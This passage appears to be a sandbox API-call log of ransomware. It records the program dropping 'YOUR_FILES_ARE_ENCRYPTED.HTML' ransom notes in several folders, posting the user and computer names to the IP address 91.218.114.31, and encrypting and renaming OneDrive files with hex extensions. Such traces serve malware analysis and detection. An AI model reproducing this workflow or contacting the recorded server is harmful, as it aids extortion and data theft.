(lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.875] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.877] CloseHandle (hObject=0x5a0) returned 1 [0171.877] GetProcessHeap () returned 0x270000 [0171.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0171.878] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, 
ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0171.878] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0171.878] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0171.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0171.879] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0171.881] CloseHandle (hObject=0x4a4) returned 1 [0171.881] GetProcessHeap () returned 0x270000 [0171.882] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea008 | out: hHeap=0x270000) returned 1 [0171.882] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa145187, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xc371f54c, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0171.882] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 
[0171.882] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 42 [0171.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0171.882] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0171.884] CloseHandle (hObject=0x580) returned 1 [0171.884] GetProcessHeap () returned 0x270000 [0171.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0171.885] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Windows", cAlternateFileName="")) returned 1 [0171.885] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x7d2061a0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0x7d2061a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Windows", cAlternateFileName="")) returned 0 [0171.885] FindClose (in: hFindFile=0x42f2fc0 | out: 
hFindFile=0x42f2fc0) returned 1 [0171.885] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 36 [0171.885] CreateFileW (lpFileName="\\\\?\\C:\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x57c [0171.886] WriteFile (in: hFile=0x57c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebea50, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebea50*=0x3c00, lpOverlapped=0x0) returned 1 [0171.888] CloseHandle (hObject=0x57c) returned 1 [0171.890] GetProcessHeap () returned 0x270000 [0171.891] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x430df38 | out: hHeap=0x270000) returned 1 [0171.891] GetProcessHeap () returned 0x270000 [0171.892] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42fdf30 | out: hHeap=0x270000) returned 1 [0171.894] Sleep (dwMilliseconds=0x1388) [0176.904] GetUserNameExA (in: NameFormat=0x1, lpNameBuffer=0x4ebe62c, nSize=0x4ebea90 | out: lpNameBuffer="", nSize=0x4ebea90) returned 0x0 [0176.905] GetUserNameA (in: lpBuffer=0x4ebe62c, pcbBuffer=0x4ebea8c | out: lpBuffer="5AlR3U30D3", pcbBuffer=0x4ebea8c) returned 1 [0176.905] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x4ebe22c, nSize=0x4ebea90 | out: lpBuffer="mYB7za2af", nSize=0x4ebea90) returned 1 [0176.906] GetProcessHeap () returned 0x270000 [0176.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x78) returned 0x316b18 [0176.906] InternetCrackUrlA (in: lpszUrl="http://91.218.114.31", dwUrlLength=0x14, dwFlags=0x0, lpUrlComponents=0x4ebe1b0 | out: lpUrlComponents=0x4ebe1b0) returned 1 [0176.962] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 Edg/84.0.522.40", 
dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0176.962] InternetConnectA (hInternet=0xcc0004, lpszServerName="91.218.114.31", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0176.963] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84083100, dwContext=0x0) returned 0xcc000c [0176.963] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x316b18*, dwOptionalLength=0x77) returned 1 [0177.768] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x4ebdf90, lpdwBufferLength=0x4ebe1f0, lpdwIndex=0x0 | out: lpBuffer=0x4ebdf90*, lpdwBufferLength=0x4ebe1f0*=0x3, lpdwIndex=0x0) returned 1 [0177.768] atoi (_Str="200") returned 200 [0177.768] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0177.768] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0177.769] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0177.769] GetProcessHeap () returned 0x270000 [0177.769] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x316b18 | out: hHeap=0x270000) returned 1 [0177.769] ExitProcess (uExitCode=0x0) Thread: id = 17 os_tid = 0x840 Thread: id = 18 os_tid = 0x844 Thread: id = 19 os_tid = 0x674 Thread: id = 20 os_tid = 0x178 Thread: id = 21 os_tid = 0x708 [0088.117] CoGetContextToken (in: pToken=0x6f8f8e4 | out: pToken=0x6f8f8e4) returned 0x0 [0088.117] CObjectContext::QueryInterface () returned 0x0 [0088.117] CObjectContext::GetCurrentThreadType () returned 0x0 [0088.117] Release () returned 0x0 [0088.117] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 22 os_tid = 0xc8 Thread: id = 25 os_tid = 0x8c8 Thread: id = 26 os_tid = 0x8d8 [0101.213] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0101.214] CoGetContextToken (in: pToken=0x700f364 | out: pToken=0x700f364) returned 0x0 [0101.214] 
CObjectContext::QueryInterface () returned 0x0 [0101.214] CObjectContext::GetCurrentThreadType () returned 0x0 [0101.214] Release () returned 0x0 [0101.214] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0101.214] CoUninitialize () [0128.238] CoUninitialize () Thread: id = 104 os_tid = 0xaec [0142.347] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0156.308] ReadFile (in: hFile=0x5ac, lpBuffer=0x75826a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7562568 | out: lpBuffer=0x75826a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7562568) returned 1 [0156.310] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0156.323] WriteFile (in: hFile=0x5ac, lpBuffer=0x75826a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7562568 | out: lpBuffer=0x75826a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7562568) returned 1 [0156.345] RtlInterlockedCompareExchange64 () returned 0x4 [0156.345] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0160.742] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7422118, ReturnLength=0x714f8ac) returned 0x0 [0160.743] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml", lpString2=".28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml.28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ExclusionList.xml.28CA7344568C01DE041C369BF0CCA21651B22F8338941770474050D7FDCC5546" [0160.743] GetProcessHeap () returned 0x270000 [0160.743] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7420660 [0160.743] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x714f89c, FileInformation=0x7420660, Length=0x168, FileInformationClass=0xa) returned 0x0 [0160.916] CloseHandle (hObject=0x590) returned 1 [0160.920] GetProcessHeap () returned 0x270000 [0160.921] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0160.921] RtlInterlockedCompareExchange64 () returned 0x6 [0160.921] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0161.038] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0161.040] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll", lpString2=".133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll.133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSync.LocalizedResources.dll.133F2320606640C4589B21F84248B01DDAE4D14FEFE289CE6D9FD2A579343237" [0161.040] GetProcessHeap () returned 0x270000 [0161.040] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x184) returned 0x426a368 [0161.041] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x714f89c, FileInformation=0x426a368, Length=0x184, FileInformationClass=0xa) returned 0x0 [0161.161] CloseHandle (hObject=0x5ac) returned 1 [0161.165] GetProcessHeap () returned 0x270000 [0161.166] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0161.169] RtlInterlockedCompareExchange64 () returned 0x3 [0161.169] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.091] ReadFile (in: hFile=0x5ac, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.092] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.093] WriteFile (in: hFile=0x5ac, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 
[0162.110] RtlInterlockedCompareExchange64 () returned 0x0 [0162.110] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.111] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0162.113] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png", lpString2=".9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png.9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ScreenshotOptIn.png.9F3BF67F4C906838600A8A5E998C8027034F06C243AB1DECF7F3751F4D35A65F" [0162.113] GetProcessHeap () returned 0x270000 [0162.113] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x16c) returned 0x328420 [0162.113] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x714f89c, FileInformation=0x328420, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0162.224] CloseHandle (hObject=0x5ac) returned 1 [0162.267] GetProcessHeap () returned 0x270000 [0162.268] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0162.268] RtlInterlockedCompareExchange64 () returned 0x2 [0162.268] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, 
lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.949] ReadFile (in: hFile=0x5b8, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0162.950] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0162.963] WriteFile (in: hFile=0x5ac, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0162.972] RtlInterlockedCompareExchange64 () returned 0x1 [0162.972] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.089] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x744a270, ReturnLength=0x714f8ac) returned 0x0 [0163.092] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll", lpString2=".52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll.52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\WnsClientApi.dll.52C5F0266A008B969405D5C65EE4D5684EA371C5D3E029DDD4A36271BCFB4A3B" [0163.092] GetProcessHeap () returned 0x270000 [0163.092] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x166) returned 0x7420db8 [0163.093] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x7420db8, Length=0x166, FileInformationClass=0xa) returned 0x0 [0163.101] CloseHandle (hObject=0x5b8) returned 1 [0163.248] GetProcessHeap () returned 0x270000 [0163.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0163.250] RtlInterlockedCompareExchange64 () returned 0x1 [0163.250] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.311] ReadFile (in: hFile=0x5b8, lpBuffer=0x7400180, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0163.311] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.312] WriteFile (in: hFile=0x5b8, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0163.317] RtlInterlockedCompareExchange64 () returned 0x0 [0163.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.318] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x73e00f8, ReturnLength=0x714f8ac) returned 0x0 [0163.319] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log", lpString2=".11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log.11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_a24-9b8.log.11D927A7ABEC850C488AA173009178770B7B0DB4D487C71D92E8B002E502A95C" [0163.319] GetProcessHeap () returned 0x270000 [0163.319] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427ae88 [0163.319] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x714f89c, FileInformation=0x427ae88, Length=0x178, FileInformationClass=0xa) returned 0x0 [0163.321] CloseHandle (hObject=0x5b8) returned 1 [0163.325] GetProcessHeap () returned 0x270000 [0163.326] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.326] RtlInterlockedCompareExchange64 () returned 0x1 [0163.326] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.331] ReadFile (in: hFile=0x594, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x4400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: 
lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0163.332] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.333] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0163.334] RtlInterlockedCompareExchange64 () returned 0x0 [0163.334] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x714f8b8, lpCompletionKey=0x714f8b4, lpOverlapped=0x714f8b0) returned 1 [0163.335] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x714f8ac | out: ObjectInformation=0x7422118, ReturnLength=0x714f8ac) returned 0x0 [0163.336] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log", lpString2=".D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log.D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-23_085814_b38-b30.log.D59C54C564B0A1DF420F749925B2EDCF8551A6DF37FD5DFBA0C03209E5D2404E" [0163.336] GetProcessHeap () returned 0x270000 [0163.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b010 [0163.336] NtSetInformationFile 
